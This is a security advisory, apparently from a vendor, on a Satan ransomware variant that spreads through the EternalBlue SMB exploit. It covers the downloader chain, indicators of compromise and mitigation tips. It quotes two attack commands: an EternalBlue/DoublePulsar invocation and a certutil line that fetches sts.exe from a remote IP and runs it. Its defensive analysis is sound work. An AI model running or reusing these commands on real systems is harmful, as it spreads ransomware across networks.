Satan Ransomware was first seen in January 2017. As with most ‘common’ ransomware families, it had no self-propagation techniques for it to independently infect endpoints on enterprise networks and encrypt files. But this time, EthernalBlue changes the game. This is another WannaCry-like ransomware. The new Satan Ransomware variant was discovered by security researchers from MalwareHunterTeam.
This variant is known to be packed with packer software called PECompact 2. Packer software is a program that compresses a Portable Executable file (e.g. -exe or dll) and a decompressor/decryptor code together into one executable program. There are many commercial and custom-made packers used today by malware authors. Usually they are used to evade memory pattern-based security controls.
The Infection Process:
The initial executable in the infection was seen with name “sts.exe,” which downloads the main Satan payloads (SFX archives, also extracted by the downloader to the infected machine) from a remote malware distribution server (embedded in the Satan code).
“sts.exe” needs the user to click it and execute it. It will then prompt a UAC window, after it downloads the payloads (Client.exe, ms.exe).
- “Client.exe” – holds the actual ransomware code and runs it once “sts.exe” UAC prompt is enabled.
- “ms.exe” – will initiate the EternalBlue exploit code, rendering propagation of Satan to unpatched endpoints (CVE-2017-0144, SMBv1) and encrypted files.
Once other machines have been ‘touched’ by Satan, the following command will be executed to download an additional malware helper payload (taken from Blaze’s Security blog):
“cmd /c cd /D C:\Users\Alluse~1\&blue.exe –TargetIp & star.exe –OutConfig a –TargetPort 445 –Protocol SMB –Architecture x64 –Function RunDLL –DllPayload down64.dll –TargetIp”
“down64.dll” is loaded to memory, and executes the following command:
“cmd.exe /c certutil.exe -urlcache -split -f https://22.214.171.124/cab/sts.exe c:/sts.exe&c:\sts.exe”
This will be used for dropping and running “sts.exe” on other machines in the network.
Indicators of Compromise:
- “sts.exe” – sha256: b686cba1894f8ab5cec0ce5db195022def00204f6cd143a325608ec93e8b74ee
- “Client.exe” – md5: 94868520b220d57ec9df605839128c9
- “ms.exe” – md5: 770ddc649b8784989eed4cee10e8aa04
- “down64.dll” – md5: 17f8d5aff617bb729fcc79be322fcb67
- Known HTTP User Agent: “RookIE/1.0”
Tips for Mitigation:
- The Cynet Endpoint scanner detects/remediates this threat and its additional binaries at runtime.
- Make sure to always keep your systems patched!
- The following directories should be examined:
- Make sure UAC is enabled.
- Protect network shares with ACLs, etc.
- Block the network indicators on organizational FW/Proxies.